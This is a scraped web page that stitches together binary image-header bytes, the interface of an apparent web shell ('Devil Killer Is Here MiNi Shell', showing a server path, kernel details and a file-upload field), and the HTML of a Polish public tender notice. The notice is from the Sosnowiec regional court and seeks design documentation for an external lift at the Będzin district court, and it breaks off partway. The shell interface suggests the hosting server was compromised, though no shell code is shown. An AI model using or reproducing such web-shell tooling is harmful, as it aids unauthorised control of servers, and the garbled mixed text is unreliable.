JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240830/0047948501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo-kosztorysowej budowy windy zewnętrznej w budynku Sądu Rejonowego w Będzinie - postępowanie nr 2 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Sosnowcu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 389775194</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sosnowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-205</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@sosnowiec.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://sosnowiec.so.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sądownictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowej budowy windy zewnętrznej w budynku Sądu Rejonowego w Będzinie - postępowanie nr 2 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c28dc564-7805-41ae-af84-0fbd2e9e710f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00479485</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00253376/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Opracowanie dokumentacji projektowo-kosztorysowej budowy windy zewnętrznej w budynku Sądu Rejonowego w Będzinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c28dc564-7805-41ae-af84-0fbd2e9e710f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5. Wykonawca zainteresowany<br/>udziałem w postępowaniu musi posiadać aktywne konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe<br/>informacje na temat zakładania kont podmiotów, zasady i warunki korzystania, w tym wymagania sprzętowe ww. platformy określają<br/>„Regulamin Platformy e-Zamówienia” dostępny na stronie: https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce<br/>„Centrum pomocy”.<br/>6. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z instrukcją korzystania z platformy, w<br/>szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert.<br/>7. W sytuacji awarii, błędów lub niedostępności platformy https://ezamowienia.gov.pl uniemożliwiających komunikację wykonawcy i<br/>zamawiającego oraz możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów oraz<br/>oświadczeń poprzez platformę, zamawiający dopuszcza komunikację oraz przesyłanie ww. za pomocą poczty elektronicznej na<br/>adres: przetargi@sosnowiec.so.gov.pl.<br/>8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgodny z wymaganiami określonymi w rozporządzeniu w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. (Dz.U. z 2020 r. poz. 2452)<br/>9. Zamawiający nie przewiduje komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>10. W korespondencji związanej z niniejszym postępowaniem Wykonawcy powinni posługiwać się następującym znakiem<br/>postępowania: ZP.261.6.2024.<br/>11. Osobą uprawnioną przez Zamawiającego do porozumiewania się z Wykonawcami jest Edyta Kozłowska, tel. 32 368 73 28.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) Administratorem danych jest: Dyrektor Sądu Okręgowego w Sosnowcu kontakt: ul. Żeromskiego 3, 41-205 Sosnowiec;<br/>2) Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail:<br/>iod@sosnowiec.so.gov.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">szczegółowe informacje zawarto w Rozdziale XXI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.261.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zamówienie obejmuje „Opracowanie dokumentacji projektowo-kosztorysowej budowy windy zewnętrznej w budynku<br/>Sądu Rejonowego w Będzinie przy ul. Jana Sączewskiego 23 wraz z pełnieniem nadzoru autorskiego i nadzoru<br/>inwestorskiego - postępowanie nr 2”<br/>2. Szczegółowy zakres zamówienia jest określony w opisie przedmiotu zamówienia stanowiącym Załącznik nr 1 do SWZ<br/>wraz z załącznikami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 4. Zamawiający zastrzega sobie prawo do skorzystania z prawa opcji, o którym mowa w art.<br/>441 uPzp, w zakresie sprawowania nadzoru autorskiego oraz inwestorskiego nad opracowaną dokumentacji. Maksymalny<br/>czas pełnienia nadzoru autorskiego wynosi 12 miesięcy. Szczegółowy opis i zakres nadzoru autorskiego zawarty jest w<br/>załączniku nr 1 do SWZ szczegółowy opis przedmiotu zamówienia (sopz) oraz załączniku nr 8 do SWZ – projekt umowy.<br/>Celem potwierdzenia skorzystania z prawa opcji Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej,<br/>zawierające informację o uruchomieniu prawa opcji. Zamawiający jest uprawniony do skorzystania z prawa opcji poprzez<br/>złożenie jednokrotnie lub kilkukrotnie oświadczenia, o którym mowa w zdaniu poprzednim. Wynagrodzenie za wykonywanie<br/>nadzorów autorskich w ramach prawa opcji zostanie ustalone na podstawie cen podanych w ofercie Wykonawcy i czasu<br/>trwania nadzorów autorskich. Warunkiem zlecenia nadzoru autorskiego będzie udzielenie przez Zamawiającego<br/>zamówienia/zamówień na wykonanie robót budowlanych na podstawie dokumentacji projektowej. Realizacja robót<br/>budowlanych w oparciu o opracowaną dokumentację projektową może odbywać się w częściach w różnych przedziałach<br/>czasowych (na podstawie odrębnych postępowań u oddzielenie zamówienia publicznego dla różnych etapów robót). W<br/>czasie przerw w realizacji robót budowlanych nadzór autorski nie będzie prowadzony (brak potwierdzenia przez<br/>Zamawiającego konieczności prowadzenia nadzoru). W czasie przerwy w nadzorze wynagrodzenie za nadzór nie<br/>przysługuje a okres ten nie wlicza się do czasu pełnienia nadzoru autorskiego.<br/>4.2.10. Maksymalna wartość opcji 45 000,00 zł. brutto <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oceny ofert dokonuje pracownik wskazany przez Dyrektora Sądu Okręgowego w Sosnowcu.<br/>2. Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi<br/>kryteriami:<br/>Kryterium oceny ofert Waga<br/>Cena (C) 60<br/>Doświadczenie personelu kluczowego (K) 40</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie personelu kluczowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału<br/>w postępowaniu dotyczące:<br/>4) zdolności technicznej lub zawodowej w zakresie posiadania doświadczenia - Zamawiający uzna warunek za spełniony,<br/>jeżeli Wykonawca:<br/>1.4.1 dysponuje osobami legitymującymi się doświadczeniem i kwalifikacjami odpowiednimi do powierzonego stanowiska:<br/>1.4.1.1. Projektant w specjalności architektonicznej, który spełnia wszystkie<br/>niżej wymienione warunki:<br/>• posiada prawo do pełnienia samodzielnych funkcji technicznych<br/>w budownictwie, tj. uprawnienia budowlane w specjalności<br/>architektonicznej do projektowania bez ograniczeń;<br/>1.4.1.2. Projektant w specjalności konstrukcyjno-budowlanej, który spełnia<br/>wszystkie niżej wymienione warunki:<br/>• posiada uprawnienia budowlane do projektowania bez ograniczeń<br/>w specjalności konstrukcyjno-budowlanej;<br/>1.4.1.3. Projektant w specjalności sanitarnej, który spełnia wszystkie niżej<br/>wymienione warunki:<br/>• posiada uprawnienia budowlane do projektowania w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez<br/>ograniczeń;<br/>1.4.1.4. Projektant w specjalności elektrycznej, który spełnia wszystkie niżej<br/>wymienione warunki:<br/>• posiada uprawnienia budowlane do projektowania bez ograniczeń<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych;<br/>1.4.1.5 Projektant w specjalności teletechnicznej, który spełnia wszystkie niżej<br/>wymienione warunki:<br/>• posiada uprawnienia budowlane do projektowania bez ograniczeń<br/>w specjalności teletechnicznej;<br/>1.4.2. Wykonawca potwierdzi, że w okresie ostatnich 3 lat przed upływem terminu<br/>składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, zrealizował minimum jedno zadanie, które spełnia wszystkie niżej wymienione warunki:<br/>• polega na zrealizowaniu usług projektowych;<br/>• w zakresie opracowania wielobranżowej dokumentacji projektowo kosztorysowej na budowę windy zewnętrznej<br/>• na podstawie której uzyskano prawomocne pozwolenie na budowę<br/>• o wartości minimum 80.000,00 zł (słownie: osiemdziesiąt tysięcy złotych zero groszy) brutto.<br/>1.5. Informacje dodatkowe<br/>1.5.1. Wykonawca zobowiązany jest zapoznać się szczegółowo z przedmiotem<br/>zamówienia, tak aby zapewnić na stanowiskach kluczowych specjalistów osoby uprawnione do pełnienia samodzielnych<br/>funkcji technicznych przy projektowaniu w branżach i zakresie gwarantującym realizację zamówienia zgodnie z opisem<br/>przedmiotu zamówienia.<br/>1.5.2. Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane.<br/>1.5.3. Dopuszcza się uprawnienia równoważne (upoważniające do projektowania<br/>w zakresie objętym niniejszym przedmiotem zamówienia) – dla osób, które posiadają uprawnienia uzyskane przed dniem<br/>wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane, nadane na podstawie wcześniej obowiązujących przepisów<br/>o ile swoim zakresem odpowiadają wymaganiom Zamawiającego.<br/>1.5.4. W przypadku Wykonawców zagranicznych, dopuszcza się również kwalifikacje,<br/>zdobyte w innych państwach, na zasadach określonych w art. 12 a ustawy Prawo budowlane, z uwzględnieniem<br/>postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej.<br/>1.5.5. W przypadku osób będących obywatelami państw członkowskich UE,<br/>Konfederacji Szwajcarskiej lub państw członkowskich (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym –<br/>prawo do wykonywania samodzielnych funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub prawa do świadczenia usług transgranicznych.<br/>2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni wykonawcy - Załącznik nr 4 do SWZ.<br/>3) W przypadku, gdy Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu bazuje na<br/>udostępnionych zasobach podmiotu trzeciego – spełnienie wymogu dotyczącego braku podstaw wykluczenia, o którym<br/>mowa w rozdziale VIII musi zostać wykazane również przez ten podmiot.<br/>4) Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów składa wraz z ofertą zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub<br/>inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów - Załącznik nr 4.1 do SWZ.<br/>5) Zamawiający na każdym etapie postępowania może uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia.<br/>6) Zamawiający nie wymaga wykazania braku podstaw do wykluczenia w stosunku do podwykonawców, którym<br/>Wykonawca zamierza powierzyć wykonanie części zamówienia, a którzy nie udostępniają Wykonawcy swoich zasobów na<br/>wykazanie spełniania warunków udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">informacji z Krajowego Rejestru Karnego w zakresie:<br/>• art. 108 ust. 1 pkt 1 i 2 ustawy PZP,<br/>• art. 108 ust. 1 pkt 4 ustawy PZP, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>b) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 5 do SWZ;<br/>c) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności<br/>technicznej lub zawodowej Zamawiający zażąda następujących dokumentów:<br/>a) wykazu usług wykonanych lub wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wraz z podaniem opisu usługi, ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały<br/>wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>usługi zostały wykonane, lub są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów - oświadczenie wykonawcy; w przypadku świadczeń nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Jeżeli Wykonawca powołuje się<br/>na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami, wykaz dotyczy usług, w których wykonaniu<br/>Wykonawca ten bezpośrednio uczestniczył lub uczestniczy – Załącznik nr 6 do SWZ,<br/>b) wykazu osób - projektantów skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w ilości niezbędnej do<br/>realizacji zamówienia wg Rozdz. VII pkt. 1.4.1 SWZ– Załącznik nr 7 do SWZ;<br/>Uwaga: na podstawie art. 274 ust. 2 ustawy PZP Zamawiający wzywa do złożenia wykazu osób wraz z ofertą. Wykaz będzie<br/>podstawą do przyznania punktacji w kryterium oceny ofert „Doświadczenie personelu kluczowego” – w branży architektonicznej .<br/>Dokumenty wskazane w punkcie 1) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje 